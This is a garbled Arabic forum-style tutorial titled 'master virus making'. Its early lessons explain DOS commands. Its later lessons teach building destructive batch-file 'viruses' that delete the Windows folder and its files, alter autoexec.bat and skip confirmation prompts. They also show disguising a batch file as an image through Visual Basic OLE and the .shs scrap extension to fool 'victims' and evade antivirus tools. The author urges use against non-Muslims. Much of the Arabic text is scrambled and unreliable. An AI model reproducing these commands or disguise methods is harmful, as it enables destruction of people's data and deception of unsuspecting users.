احترف صناعة الفايروسات

الرحيم الرحمن الله بسمعليكم السلم

: الول الدرس( الأول ( الجزء الفيروسات

! التدمير و اخطارها؟ و الفيروسات يعرف ل منا من! الفيروسات بهذه تحقيقه الممكن

, مستهتر ال فليس الذي بغرض الفيروسات يصنع من , اخطر من و مضرة اشياء في العلم يستعمل غبي

فيروس هو الن حتي صنعت التي الفيروسات , شاب, اخترعه كليا الجهاز بتدمير يقوم الذي شرنوبيل

.. التدمير ال يهوي ل عمره من العشرين و الحادي في: الفيروسات عن مقدمة

, .. اما الخ باسكال و دلفي مثل ببرامج الفيروسات تصنع , مدمرة برامج بل فيروسات ليس الن سنصنعه ما , النورتن يستطيع ل و الفيروسات عمل بنفس تقوم

كشفها.. , بأكواد كلها و سهلة و بسيطة الفيروسات هذه أفكار

, , يجب الخاص فيروسك لتصميم ولكن قبل من درسناها , طريقة اعرف و المثلة الي انظر الذكاء لديك يتوافر ان

.. مثلها افكار اصنع ثم الفيروسات هذه صنع ضد الفيرووس هذه استخدام عدم مسلم اخ كل من ارجو

المسلمين غير بس كتير كلم عن هيكون دا الول الدرس بس

الفيروسا تصنيع في تساعدنا حاجات بس الفيروسات الدوس اول بكل ابدا حاجة اول

الدوس اوامر من سوفا الخ بشرح استعن ودي الدوس اوامر دي

القراصنة منتدي DOSكلمة ( لـ) Disk Operating Systemاختصار

الـ* DOSتعريف الأوامر : من مجموعة هو. اللي الحاسب مكونات في تتحكم التي والتعليمات

الـ DOSدور : الوصل حلقة هو الكمبيوتر جهاز في. والمستخدم الكمبيوتر بين

: الملفات الـ يقدمها التي الخدمات أهم DOSإن تنظيم هي

. الملفات في البيانات حفظ : أو البرامج لحفظ وعاء عن عبارة هو الملف تعريف

بالنسبة للحفظ وحدة أصغر وهو البيانات، أو النصوص. التشغيل لنظام

: الملفات* تسمية: قسمين إلي الملف اسم ينقسم

) : الأساس وهو الأول ROOTالقسم يزيد ) أل ويجب عن 8طوله . ضروري الملف اسم من الجزء وهذا حروف

. وجوده يجب إي : طوله يزيد أل ويجب المتداد ويسمى الثاني القسم

) 3عن ) و الأساس السم بين يفصل أن ويجب حروف، .( . ) السم من الجزء وهذا النقطة بعلمة المتداد

. عنه الستغناء يمكن اختياري التالية الإمدادات بأحد تنتهي التي الملفات جميع

BAT , EXE , COM. المباشر والتنفيذ للتحميل قابلة

مع المستخدمة الإمدادات أنواع أشهر بعض هنا ونبين: الكاملة ملفاتها أسماء

.BAT ) واحدة دفعة تنفذ أوامر ).BATCHملف.COM ) برنامج ).COMMANDملف

.EXE ) للتنفيذ جاهز ).EXECUTABLEملف.DOC ) وثائق أو نصوص ).DOCUMENTملف

.ASM) التجميع بلغة مكتوب برنامج مصدر ملفASSEMBLY.(

.BAK ) احتياطي ).BACKUPملف.BAS ) بيسك برنامج ).BASICملف

.DBF ) بيانات قاعدة ).DBASE FILEملف.PAS) باسكال بلغة مكتوب برنامج ملف

PASCAL.( .SYS ) نظام تكوين ).SYSTEMملف.C ) سي بلغة مكتوب مصدر ).Cملف

: الملفات تسمية في المستخدمة الرموز1 من الأبجدية Aالحروف Zإلي صغيرة ( كانت سواء

.( كبيرة أو2 من 0الأرقام .9إلي

3 # $ % & ( ) { } ) : ، ، ، ، ، ، مثل العلمات بعض.( !‌‍‍‍‍‍‍

: الملف* اسم اختيار عند مراعاتها يجب التي الشروط1 من للملف الأساسي السم .18طول حروف

2 عن وجد إن الممتد السم يزيد أل .3يجب أحرف

3 إن الممتد والسم الأساسي السم بين يفصل أن.( . ) النقطة بعلمة وجد

4 بدون الممتد والسم الأساسي السم يكتب أنفراغات.

5 ) : وهي التحكم مفاتيح استخدام ، ALTعدمCTRL ، ESC. اسم ) أي في

6 مثل التشغيل لنظام المحجوزة الأسماء استخدام عدمCON أو العرض شاشة و المفاتيح يلوحة PRNالخاص

. الطابعة باسم الخاص7 لنظام الخاصة الدللة ذات الرموز استخدام عدم

.( = + / * ؟ ، ، ، ، ، وهي التشغيل: القرص على الملفات تنظيم

إنشاء يجب القرص على منظمة ملفات على للحصول Directoryالدليل ( الملفات ) مع التعامل يسهل فذلك

. بسهولة وترتيبها ) الدليل Directoryتعريف مجموعة ): عن عبارة هو

. معين دليل مسمى تحت توضع ملفات: : أقسام أربعة إلي الأدلة تقسم الأدلة أقسام

1 : يقوم الذي الدليل وهو الرئيسي بإنشائه Dosالدليل جميع تحته وتوضع السطوانة تشكيل عند ا تلقائي

. المنشأة الملفات2) : رئيسي دليل تحت ينشأ الذي وهو الفرعي الدليل

subdirectory.( من كبير عدد مع يتعامل الكمبيوتر مستخدم لأن ونظرا

أدلة في الملفات هذه توزع أن يفضل لذلك الملفاتفرعية.

أو الرئيسي الدليل داخل الفرعية الأدلة إنشاء ويمكن. أخرى فرعية أدلة داخل

: أن هو الفرعي والدليل الرئيسي الدليل بين الفرق ينشئ بينما ا، تلقائي الرئيسي الدليل ينشئ النظام

. الفرعي الدليل المستخدم يوجد قد بينما قرص كل في واحد رئيسي دليل يوجد

. فرعية أدلة عدة القرص في3 : أدلة منه تتفرع الأدلة من نوع وهو الأبوي الدليل

. لهم ا أبوي ل دلي فيصبح عديدة فرعية: ذلك على ومثال

SCHOOLCLASS ) الدليل SCHOOLإن ل ) دلي يعتبر السابق المثال في

) الفرعي للدليل ا ).CLASSأبوي4 : وقت مستخدما يكون الذي الدليل وهو الحالي الدليل

مع التعامل يتم الذي الدليل هو وكذلك ، عليه العمل بدليل يرتبط ل آخر دليل اسم يسبقها أن بدون ملفاته

أبوي.: المرنة* الأسطوانة من التشغيل نظام تحميل طريقة

: ذلك لعمل طريقتين هناك( ) : مغلق الجهاز يكون أن يجب الأولى الطريقة

1 الأقراص محرك في الدوس اسطوانة .Aندخل2. الكمبيوتر جهاز بتشغيل نقوم

( ) : يعمل الجهاز يكون حين الثانية الطريقة1 الأقراص محرك في الدوس اسطوانة .Aندخل

2 : معا التالية المفاتيح على بالضغط + ALTنقومCTRL + DELETE.

) التشغيل* نظام في الأقراص محركات ):DOSرموز1 ) المرنة Floppy Diskالأسطوانة هناك ): ويوجد

: وهما المرنة الأسطوانات من نوعين حجم مرنة أسطوانة .3.5أ بوصة حجم مرنة أسطوانة .5.25ب بوصة

بالرمز المرنة الأسطوانات لمحرك Aويرمز .Bأو 2 ) الصلب Hard Diskالقرص بالرمز ): له .Cويرمز

3 ) CDROM بالرمز ): له Dويرمز .Eأو : بالضغط* الأقراص محركات بين التنقل طريقة

: بـ نلحقه ثم الرمز على

) الـ* التشغيل لنظام الساسية الملفاتDOS:(

تمثل أساسية ملفات ثلثة من التشغيل نظام يتكون: كالتالي وهي له الفقري والعمود للنظام الأساسية البنية

ل: IO.SYSأو الإدخال : في بالتحكم خاص الملف وهذاوالإخراج.

ا: MSDOS.SYSثاني على : يحتوي الملف وهذا عند الذاكرة في توضع التي الأوامر من كبيرة مجموعة

التشغيل.ا: COMMAND.COMثالث على : يحتوي الملف وهذا

. الداخلية التشغيل نظام أوامر جميع: التشغيل* نظام مكونات

: رئيسية أجزاء ثلثة إلي التشغيل نظام ينقسم عبارة الثاني والجزء الأجهزة في يتحكم منه الأول الجزء

بصورة تعمل والأوامر التعليمات من مجموعة عن

بها التحكم يمكنه ول فيها للمستخدم دخل ل تلقائية ) فقط القراءة ذاكرة في مخزنة والتي ) ROMوهي

عن عبارة الثالث والجزء تعديلها أو مسحها ليمكن للمستخدم خدمات تعتبر البرامج و الأوامر من مجموعة

. الكمبيوتر استخدام له وتيسر: الختصارات*

) التشغيل نظام DOSيستخدم اثنين ) اختصارين صيغة داخل منها جزء أو الملفات أسماء عن ا عوض

: وهما الأوامر1 : ( ? ) واحد) حرف غياب على للدللة ويستخدم الرمز

. الملفات أحد اسم من فقط2 : ( * ) عدد) أي غياب على للدللة ويستخدم الرمز

) يتجاوز ل أن بشرط الحروف ).8من أحرف

: الأوامر* الـ أوامر :DOSتنقسم قسمين إلى

1 : يتم التي الأوامر وهي الداخلية الأوامر الـ ذاكرة إلى RAMتحميلها الجهاز تشغيل أثناء

الأوامر من النوع هذا أن بمعنى الذاكرة من تنفيذها ويتم. لتنفيذه أسطوانة وجود يستلزم ل

: الداخلية الأوامر أمثلة منCLS TIME DATE MD CD RD DIR

DEL2 : يتم ل التي الأوامر وهي الخارجية الأوامر

الـ ذاكرة إلى RAMتحميلها الجهاز تشغيل أثناء منها أمر إي تنفيذ وليتم الأسطوانة على تبقى وإنما

المشغل داخل التشغيل نظام اسطوانة وجود يشترط. الصلب أو المرن

: الخارجية الأوامر أمثلة منFORMAT DISKCOPY DISKCOMP

COMP SYS EDIT إلي والخارجية الداخلية التشغيل نظام أوامر تنقسم

: أنواع ستة1: النظام أوامر

MEMDATEVER

DosKeyPROMPT

CLSVSAFE

MEMMAKERMODE

COMMANDMSDTIME

DEFRAG2: السطوانة أوامر

SCANDISKCHKDSKFORMAT

DISKCOMP

DISKCOPYMSBACKUP

SYSLABELFDISK

UNFORMATVOL

3: الفهرس أوامرAPPEND

DIRCDRD

MOVEDATE

DELTREEMD

TREE4: الملفات أوامر

TYPECOPY CON

COPYATTRIB

DELREN

UNDELETEXCOPY

PRINTFINDEDITSORTMSAVMOREHELP

5: الحزمية الأوامرREMCALLECHOFOR

IFPAUES

SHIFT CHOICEGOTO

6: الستخدام ونادرة خاصة أوامرFASTOPENMSCDEX

CHCPINTERLNK

QBASICDRVSPACE.SYS

LOADFIXSHARE

FASTHELP

NLSFUNCCTTY

INSTALL.HIGHRECOVER

DEBUGKEYB

عليكم السلم

: الول الدرس( الثاني ( الجزء الفيروسات

الـ* نظام في المستخدمة الوامر لهم شرحDOS:

1 : VERالأمر كلمة ( اختصار وتعني VERSIONوهو ووظيفته ) الداخلية الأوامر من وهو إصدار

الـ التشغيل نظام إصدار رقم عن MSالستعلمDOS.

الأمر بكتابة قم ذلك على VERومثال الـ :DOSفي مفتاح على بالضغط ENTERثم MSDOSسيظهر

VER 6.22. : حسب آخر إلي جهاز من تختلف الإجابة هذه ملحظة

. التشغيل نظام نسخة2 : DATEالأمر ( الداخلية ( الأوامر من وهو التاريخ

إمكانية مع بالجهاز الموجود التاريخ عرض ووظيفتهتعديله.

الأمر بكتابة قم ذلك على DATEومثال الـ فيDOS:

مفتاح على بالضغط ENTERثم currentسيظهر Date is THU 032599 Enter New Dateوكذلك

mmddyy تسجل الجديد التاريخ ولإدخال للتعديل كتابة في نرغب لم وإذا السنة ثم اليوم ثم الشهر ل أو

الإدخال مفتاح على الضغط يكفي جديد تاريخENTER. شئ إي كتابة بدون

: آخر إلي جهاز من تختلف ا طبع الإجابة هذه ملحظة. التاريخ حسب

التشغيل نظام في التاريخ كتابة :DOSشروط1 سنة قبل تاريخ إي يقبل ل التشغيل .1980نظام

2. الهجري التاريخ استخدام يمكن ل3. بالحروف الأشهر كتابة يمكن ل

4 : بين كفاصل الرأسيتين النقطتين استخدام يمكن لالتاريخ في

5) الأمريكي النظام التاريخ كتابة في تستخدم mmأنddyy. السنة) ثم اليوم ثم الشهر

3 : TIMEالأمر ( الداخلية ( الأموامر من وهو الوقت الحاسب جهاز داخل المسجل الوقت عرض ووظيفته

. تعديله إمكانية مع الأمر بكتابة قم ذلك على TIMEومثال الـ DOSفي

مفتاح على بالضغط ENTERثم currentسيظهر Time is : 4:40:55.75a Enter New Timeوكذلك

ثم الدقائق ثم الساعات ل أو تسجل بأن وذلك للتعديل أو ا صباح الوقت تحديد ثم الثواني كسر ثم الثواني

يكفيك جديد وقت كتابة في ترغب لم وإن ا مساء الإدخال مفتاح على ENTERالضغط إي كتابة بدون

شئ . : آخر إلي جهاز من تختلف ا طبع الإجابة هذه ملحظة

. الوقت حسب4 : CLSالأمر لجملة ( اختصار Clear Theوهو

Screen ( الداخلية الأوامر من وهو الشاشة مسح وتعني التي البيانات كافة من الشاشة تنظيف هي ووظيفته على سطر أول إلي التشغيل محث وإرجاع عليها

. الأمر تنفيذ أثناء موقعه كان مهما الشاشة

الأمر بكتابة قم ذلك على CLSومثال الـ :DOSفي مفتاح على بالضغط ENTERثم الشاشة تنظيف سيتم

. البيانات مسح وليس عليها الموجودة البيانات من5 : PROMPTالأمر ووظيفته الداخلية الأوامر من وهو

. التشغيل لنظام التشغيل محث شكل تغيير الأمر استخدامات أهم :PROMPTومن التالي

PROMPT $D المحث شكل Cتغيير علمة إلياليوم تاريخ

PROMPT $T المحث شكل Cتغيير علمة إليالحالي الوقت

PROMPT $Q المحث شكل =Cتغيير علمة إليPROMPT المحث $$ شكل $Cتغيير علمة إلي

PROMPT $V المحث شكل Cتغيير إصدار رقم إليالتشغيل نظام

6 : VOLالأمر لكلمة ( اختصار )Volume Labelوهو الأسطوانة اسم عرض ووظيفته الداخلية الأوامر من وهو

الداخلي الأمر بكتابة قم ذلك غلى VOLومثال الـ DOSفي

مفتاح على بالضغط ENTERثم Volume inسيظهر drive C is alwafa

: آخر إلي جهاز من تختلف ا طبع الإجابة هذه ملحظة. القرص اسم حسب

7 : DIRالأمر عرض ووظيفته الداخلية الأوامر من وهو خلله ومن الحالي الفهرس على الموجودة الملفات

: عرض نستطيع1. لها المسلسل والرقم السطوانة اسم

2. له الحالي والمسار الحالي الفهرس اسم3 ) الملف اسم بيانات بخمس الموجودة الملفات عرض

) ( ) حجم بالبايت الملف مساحة امتداده الملف نوع. ( الملف) إنشاء وقت الملف إنشاء تاريخ الملف

4) اسم وهي بيانات بأربعة الموجودة الفهارس عرض > الشكل على وتكون الفهرس علمة >DIRالفهرس

إنشاء وقت الفهرس إنشاء تاريخ الفهرس اسم بجوارالفهرس ).

5 بالفهرس الموجودة الملفات عدد إجمالي تعرض رسالة لهذه الكلية المساحة وكذلك عرضه يتم والذي الحالي

الملفات.6 أو السطوانة على الشاغرة أو الحرة المساحة

القرص .

الرحيم الرحمان الله بسم

: الول الدرس( الثالث ( الجزء الفيروسات

الأمر استخدامات صور :DIRأهمDIR/P صفحة صفحة الملفات لعرضDIR/W الشاشة بعرض الملفات لعرض

DIR/B فقط ونوعها والملفات الفهارس أسماء لعرضDIR/L بالحروف والملفات الفهارس أسماء لعرض

الصغيرةDIR/S بالفهرس الموجودة والفهارس الملفات كل لعرض

الحاليDIR/O أبجدي ترتيب مرتبة والملفات الفهارس لعرض

Aمن Zإلي DIR/OS حسب مرتبة والملفات الفهارس لعرض

الأكبر إلي الأصغر من بالبايت مساحتها

DIR/AH فقط المخفية الملفات عرضDIR/AR من محمية وهي فقط القراءة ملفات عرض

الإلغاءDIR/AS فقط النظام ملفات عرض

DIR/AD الملفات بدون فقط الفهارس جميع عرضDIR/AA الأرشيف علمة تحمل التي الملفات عرض

فقط8 : MDالأمر لكلمة ( اختصار )Make Directoryوهو

من فرعي فهرس إنشاء ووظيفته الداخلية الأوامر من وهو فهرس من فرعي فهرس إنشاء أو الرئيسي الفهرس

. آخر فرعي9 : CDالأمر لكلمة ( اختصار Changeوهو

Directory: ووظيفته ) الداخلية الأوامر من وهو1 الحالي الفهرس معرفة

2: من إما الفهارس بين النتقال فرعي إلي رئيسي رئيسي إلي فرعي

نكتب عليه نقف الذي الحالي الفهرس معرفة أردنا وإذا CDالأمر مفتاح على بالضغط نقوم ثم ENTERفقط

10 RDالأمر لكلمة ( اختصار RemoveوهوDirectory أو ) حذف ووظيفته الداخلية الأوامر من وهو

فرعي فهرس إي إزالة أو ،ولحذف الفرعي الفهرس إزالة: شرطين فهناك

1 الفهرس داخل الموجودة والبرامج الملفات جميع إزالة. إزالته المراد الفرعي

2 نقف الذي هو إزالته المراد الفرعي الفهرس يكون أل أعلى آخر فهرس على نكون أن يجب بل الن عليه

. رتبة منه11 : COPYالأمر ووظيفته الداخلية الأوامر من وهو

فهرس أو الفهرس نفس في ملفات مجموعة أو ملف نسخ. أخرى أسطوانة في أو آخر

12 : COPY CONالأمر الداخلية الأوامر من وهو لوحة من جديدة نصية ملفات وكتابة إنشاء ووظيفته

. وطباعتها وعرضها المفاتيح الأمر عيوب :COPY CONومن إنه

1 الضغط وتم كتابته تمت قد لسطر الصعود يمكن ل الإدخال مفتاح .ENTERعلى

2 نفس من حفظه بعد به للتعديل ملف فتح يمكن ل نظام مع الموجود النصوص محرر من يكون بل الأمر

DOSالتشغيل .EDITوهو : الأمر طريق عن المنشأ الملف لحفظ COPYملحظة

CON: التالية الخطوات إحدى بعمل قم مفتاحي على الضغط ctrl+zأ مفتاح على الضغط ثم

الإدخال. مفتاح على الضغط F6ب مفتاح على الضغط ثم

الإدخال.13 : TYPEالأمر ووظيفته الداخلية الأوامر من وهو

. الشاشة على النصية الملفات محتويات عرض : أما النصية الملفات بعرض الأمر هذا يقوم ملحظة

النوع من التي EXECOMSYSالملفات يمكن فلعرضها .

14 : RENالأمر لكلمة ( اختصار Renameوهو من ) وهو أو نوعه أو الملف اسم تغيير ووظيفته الداخلية الأوامر

كلهما .):1مثال(

15 : DELالأمر لكلمة ( اختصار وهو ) DELETEوهو مجموعة أو ملف مسح ووظيفته الداخلية الأوامر من

في أو آخر فهرس في أو الفهرس نفس في ملفات. أخرى أسطوانة

ظهور: من بد ل الملفات كل مسح حال في ملحظة: التالية التأكيديه الرسالة

All Files in directory will be deletedAre you Sure Y/N

حرف أضغط الملفات جميع حذف أردت وإذا Yوإذا اضغط العملية إلغاء .Nأردت

16 : PATHالأمر فتح ووظيفته الداخلية الأوامر من وهو من محددة مجموعة على مسارات عدة أو مسار

وذلك أسطوانات عدة أو واحدة أسطوانة على الفهارس إي من عليها الواقعة الملفات مع التعامل يسهل حتى

أمر ويدرج PATHموقع ملف في Autoexec.batإلى ) منه سيحفظ مختلفة وبصورة الأمر تكرر لو واحد سطر

( كل بداخله ويوصف سطر آخر في له صورة آخر فقط بدون مباشرة معها بالتعامل نرغب التي الفهارس

الأمر .CDإستخدام إليها للدخول: هامة ملحظات

1 أمر PATHيوضع ملف في Autoexec.batداخل. واحد سطر

2 أمر كتابة الممكن PATHمن أقراص مشغل إي على. حاسبك فيها تفتح مرة كل في

الأمر بكتابة قم ذلك على PATHمثال الـ DOSعلى. بالجهاز الموجود المسار اسم تعرف لكي

17 : MEMالأمر ووظيفته الخارجية الأوامر من وهو. الذاكرة أنواع جميع حالة عن كاملة تقارير إعطاء

18 : :MODEالأمر ووظيفته الخارجية الأوامر من وهو1. الشاشة على وعرضها الكتابة حجم في التحكم

2 وما بالحاسب المتصلة الملحقات عن تفاصيل إعطاء. التوازي على أو التوالي على معه متصلة كانت إذا

19 : DOSKEYالأمر الخارجية الأوامر من وهوووظيفته:

1 ما كل باستدعاء وذلك الأوامر اسطر وتعديل استدعاء. أوامر من تنفيذه سبق

2 ) بالماكرو يسمى ما Macrosإنشاء عن ) عبارة وهو لها ويعطى واحد اسم تحت تجمع الأوامر من مجموعة

. واحدة بخطوة لتشغليها معين مفتاح : الأمر هامة DOSKEYملحظة بحجز كليو 4يقوم

. الأساسية الذاكرة من بايت20 : :MSDالأمر ووظيفته الخارجية الأوامر من وهو

1: حيث من الحاسب مواصفات اكتشاف مشغلت( أنواع الذاكرة حجم المعالج نوع

.( المكونات وباقي العرض نظام مواصفات الأقراص2 باكتشاف تفيد فنية تقارير على الحصول

تلف مثل الحاسب على حدثت التي المشاكل الـ الذاكرة .RAMشرائح

21 : Commandالأمر الخارجية الأوامر من وهو. الداخلي التشغيل نظام أوامر تفسير ووظيفته

22 : DEFRAGالأمر ووظيفته الخارجية الأوامر من وهو القرص أو الصلب للقرص التشغيل كفاءة برفع تتمثل

إلي المبعثرة الملفات بتجميع يقوم إنه حيث المرن. إضافية مساحة توفير وبالتالي بعضها جوار

23 : FORMATالأمر الخارجية الأوامر من وهو. المرنة أو الصلبة الأسطوانة تهيئة ووظيفته

24 : LABELالأمر ووظيفته الخارجية الأوامر من وهو. مسحه أو إسمها تعديل أو السطوانة تسمية إعادة

25 : DISKCOPYالأمر الخارجية الأوامر من وهو لها مطابقة أخرى على مرنة أسطوانة نسخ ووظيفته

بنسخ ويقوم والسعة والحجم النوع حيث من تماما. المخفية حتى الملفات كامل

الأمر : ( COPYملحظة XCOPYوالأمر يستطيعان ل.( المخفية الملفات نقل

26 : CHKDSKالأمر ووظيفته الخارجية الأوامر من وهو. حالتها عن تقرير وإعطاء الأسطوانة فحص

27 : UNFORMATالأمر الخارجية الأوامر من وهو قد كانت ما أسطوانة محتويات إستعادة ووظيفته

الأمر خلل من محتوياتها جميع .FORMATمسحت: هامة ملحظة

الأمر UNFORMATيستطيع محتويات إعادة عدم بشرط ولكن لها تهيئة عمل سبق التي الأسطوانة

الأمر مع ا مسبق FORMATإستخدامها التهيئة عند

كما الأسطوانة محتويات إعادة يستحيل فأنه وإلكانت .

28 : :SYSالأمر ووظيفته الخارجية الأوامر من وهو1 التشغيل نظام ملفات MSDOSنسخ أسطوانة إلي

ما.2 ملف .COMMAND.COMنسخ ما أسطوانة إلي

29 : DISKCOMPالأمر الخارجية الأوامر من وهو. متطابقتين اسطوانتين بين المقارنة ووظيفته صلبة: أقراص مع به التعامل ينفع ل الأمر هذا ملحظة

. الإطلق على30 : SCANDISKالأمر الخارجية الأوامر من وهو

. القرص على تالفة أجزاء إي لكتشاف ويستخدم31 : FDISKالأمر ووظيفته الخارجية الأوامر من وهو

التشغيل نظام مع للتعامل الصلب القرص وإعداد تهيئةDOS.

32 : TREEالأمر ووظيفته الخارجية الأوامر من وهو وكذلك الفهارس لشجرة المكونة الفهارس أسماء عرض

. مساراتها عرض33 : MOVEالأمر ووظيفته الخارجية الأوامر من وهو

. لخر مكان من فرعي فهرس أو أكثر أو ملف نقل34 : DELTREEالأمر الخارجية الأوامر من وهو

كان لو حتى يحتويه بما فرعي فهرس حذف ووظيفته. ملفات بداخله

35 : UNDELETEالأمر الخارجية الأوامر من وهو الأمر بواسطة الممحاة الملفات استعادة .DELووظيفته

: هامة ملحظات

1 بالأمر ملف حذف يتم DELعندما التشغيل نظام فإنDOS وتحويله الملف هذا من الأول الحرف بتغيير يقوم

. ؟ علمة إلي2 جديد آخر ملف إي تخزين قبل ملف استرجاع يمكن

. السابق الملف على36 : ATTRIBالأمر ووظيفته الخارجية الأوامر من وهو

بتغيير وذلك الملف صفحات في ويتحكم يعرض قابل أو نظام ملف أو خفي ملف ل مث كجعله خصائصه

. ذلك غير أو فقط للقراءة37 : PRINTالأمر ووظيفته الخارجية الأوامر من وهو

. فقط النصية الملفات طباعة38 : XCOPYالأمر ووظيفته الخارجية الأوامر من وهو

. الفهارس أو الملفات من مجموعة نسخ39 : EDITالأمر عبارة وهو الخارجية الأوامر من وهو

التشغيل لنظام تابع نصوص محرر DOSعن من والذي. الملفات وتعديل كتابة من تتمكن خلله

: هامة ملحظات الأمر عيوب جميع الأمر هذا حيث COPY CONيعالج

: التي عمل يمكن باستخدامه أنه1. فيه والتعديل حفظه سبق ملف فتح

2. ولأسفل ولأعلى ا ويسار ا يمين الملف داخل التحرك3 باستخدام الملف حفظ Alt+Fيتم أمر نختار Saveثم

. الملف أسم كتابة ثم باستخدام الأمر من الخروج Alt+Fيتم أمر نختار ثم

Exit.

الأمر يعمل EDITلكي ملف وجود من لبدQBASIC.EXE

الرحيم الرحمن الله بسم

: الثاني الدرس الدفاعية الملفات طريق عن الفيروسات صناعة طريقة

1: الدفاعية الملفات تعريف التشغيل نظام اوامر من حزمة عن عبارة DOSهي

في دوسي امر من اكثر استخدام خلله من يمكننه مثل الستخدام للمستخدم يسهل مما واحد وقت

امر من اكثر |format,copy,cd ..... |393استخدام2: الدفاعية. الملفات صناعة طرق

: الولى الطريقة

1 < startافتح. على واكتب Runواضغطcommand على ENTARواضغط

2) امر. |copy conاكتب الفيروس) اسم و| 564ثم batالمتداد اضغط Enterثم

3 الكود. اكتب4 هما. طريقتان لحفظ

1 على. F6اضغط ثم Enterومن2 على. Ctrl + zاضغط ثم من Enterو

: الثانية الطريقة

1< < < الملحقة. البرامج البرامج ابدأNotepadالمفكرة

2 الكود. اكتب3 بامتداد. الفيروس batاحفظ الموقع حدد و

: الثالثة الطريقة

1 < < البرامج. DOSابدأ2 Editاكتب.

3| الكود. |312ادخل4 بمتداد. الملف بحفظ batقم به الخاص المسار حدد و

3: التشغيل ايعازاتالوظيفة اليعاز

Echo( ) الشاشة على سطر تعرض الإيعاز عمل تمنعNul ل نعم السؤال بدون نقل

Call ملف الى الدخول الشاشة@ على السطر عرض يمنع

Cls الشاشة يمسحPuse زر اي على الضغط للضحية يقول

Start تغيله ليتم برنامج اي اسم ضع المر هذا بعد الفيروس تشغيل عند

End بعد الفيروس ينهي هو و الفيروس نهاية في يوضعالوامر تنفيذ

/n ل ايعازcd ملف\ الى الدخول

\cd ملف من الخروج/y| نعم |364ايعاز

الستخدام*** سهلة هي و واضحة تكون ان ارجوا

4: الفيروس تشفير طريقة بل فقط الفيروس لتشفير ليست الطريقة هذه اخواني

تغير سبب اما الفيروس امتداد تغير و الفيروس لدمج من batالمتداد exeالى الدرس في السبب اذكر فسوف

... حلول و اسئلة قسم في الرابع الـ امتداد تغير Batchيمكنك برنامج طريق عن

Microsoft Visual Basic و الخامس الصداران فيالسادس :

1 بيسك. الفيجول برنامج افتح2 الداة. OLDاختر لك تظهر سوف الدوات قائمة من

Insert Objectنافذة منها ثم Create from Fileاختر على Browseاضغط أو تريدها التي الصورة واختر

على اضغط ثم تريده شيء اي أو فلم OKمقطع3 اداة. OLEاختر واختار ثاني مربع وارسم اخرى مره

Create from File Browseثم الباتش واختر اضغط ثم تريده OKالذي

4: الفروم. كود ادخل

Microsoft Visual Basic 5.0: LE1.DoVerb OLE2.DoVerb

Microsoft Visual Basic 6.0: OLE1.DoVerbOLE2.DoVerb

me.hide الفورم ' باخفاء قوم ـت

5 قائمة. Fileمن سوف Make Project1.exeاختر

باسم نافذة Make Projectتأتيك الملف اسم اكتب اكتب مثل تسميته تريد Virus |105الذي انتهينا| لقد

امتداده ولكن الصوره مع الباتش دمج EXEمن6 امتداد. بتغيير نقوم سوف EXEالن غير امتداد الى

104معروف| النترنت| مستخدمي من الكثير قبل منوالمتداد

SHSهو امكانيات من فيه لما خطير جدا المتداد وهذا وهو الخرى البرامج مع Scrap Objectالتصال

: كالتالي هي والطريقه1 برنامج. بتشغيل WordPadقم البرنامج افتح

ملف فيه حفظت الذي مجلد وافتح النافذه وصغر على+ اضغط والن النوافذ تنسق حاول الصورة الباتش

Virusالبرنامج ترفع ول واحده مره اليسر بالزرار برنامج الى اسحبه ثم الزرار عن WordPadاصبعك

ثانيا سهوله بكل البرنامج الى الملف ينتقل سوف على اليمن بالزر اضغط

2 الى. انتقل الذي WordPadالملف Packageاختر Object Edit Packageثم بأسم نافذه لك تظهر سوف

Object Packager Package in Document اختر Editقائمة Copy Packageثم اختر واخيرا ثالثا

ملف به الذي EditServerالمجلد المكان في اضغط ثم اختر ثم اليمن الزرار على ) Pasteالفارغ سوف ( لصق

باسم غريب شكله ملف لك |Scrapيتكون |535وهذا الى امتداده تغير قد shsهوالملف دبل عليه ضغط واذا

ملف ايضا يشتغل وسوف صوره لك تظهر سوف كلك على حصلت قد والن الصوره مع دمجته الذي الباتش

. بصوره مرفق باتش Callالمر المر اما معين ملف في يبدأ startيتصل

برنامج تشغيل او امر بتنفيذ) :1مثال (

:PHPكود call attrib h r c:autoexec.bat >nul

المر استخدمنا المثال هذا في للتصال Callاخوي الملف autoexecفي خصائصه بتغير قمنا و

) :2مثال (

:PHPكود start MSPaint

يبدا ما اول الرسام برنامج بتشغيل امرنا المثال هذا فيعمله الفيروس

حرف يضغط مثل المستخدم yواريد enterويضغط و معين امر enterو nوينفذ اخر امر يتنفذ

بالفورمات تقوم عندما مثال اعطيك سوف اخي بـ اجب متأكد انت هل الحاسب يسألك سوف

Y,N لم اذ ال و الرسالة لتجاهل اليعاز هذا نكتب هنا للضحية تقول رسالة مثل يظهر سوف اليعاز نكتب

ذلك من متأكد انت هل الوندوز مجلد بحذف تقوم سوف... الفيروس... يعمل ل هكذا و ل ب يجب سوف اكيد ـو


: الثالث الدرس الدفاعية المفات طريق عن الفيروسات صناعة

صناعة احتراف دروس انكمل راح شباب يا اليوم الدفاعية المفات طريق عن Batch Filesالفيروسات

و اليعزات بعض اتعلمنا الدرس بهذاك نحن المهم ... انطي راح الدرس هذا المهم ذالك غير و تشفير طريق

هذه في انا اخواني الملفات مع العمل عن امثلة الملفات مع التعامل كيفية على اعلمكم الدروس

تصنع ان تقدر سوف التعلم بعد لنه الدفاعية تصنعون و شخص اي من مساعدة بدون فيروسات

الله شاء ان مكشوفة غير فيروسات1: امثلة و اوامر

del Delete Filedel c:\windows\*.txt

كل : بمسح قمنا المثال هذا في ما ملف لمسح الشرح الوندوز مجلد في يوجد ما

deltree Delete Folderdeltree \y c:\windows

مسحنا : هنا ملف امتداد له ليس اي ملف لمسح الشرح هذا هامة ملحوظة الوندوز بداخل ما وليس وندوز ملف

علي يعمل بي الكس علي ليعمل .98المر اوك call Open Or Call Another .bat File

call c:\windos\anything.bat و : مسح و لتحرير اخر ملف مع بأتصال قمنا هنا الشرح

نقل ...cls Clear The Screen

الحرف : من الشاشة تنظيف اجل من المر هذا الشرحecho Allows You To Write Anything

echo hahaha i will kill yr computer هو : و اليعازات اجمل احدى من المر هذا الشرح

| الضحية 596يجعل دمرتك| انا كتبة ل مث المكتوب يقرأ السطور لكتابة فقط انه اي قرائته يمكنه

goto To Go To a Nother Section In a Batch File

:startecho i hack you

goto next:next

del c:\windows\*.exe المر : استخدمنا المثال هذا في يعمل go toالشرح

554على | لتنفيذه| اخر امر الى الذهاب

copy %0 To Copy The Running File To Another Place

copy %0 c:MyDocument\anything.bat ملف : لنسخ مخصص فهو المر هذا عن اما الشرح

copy

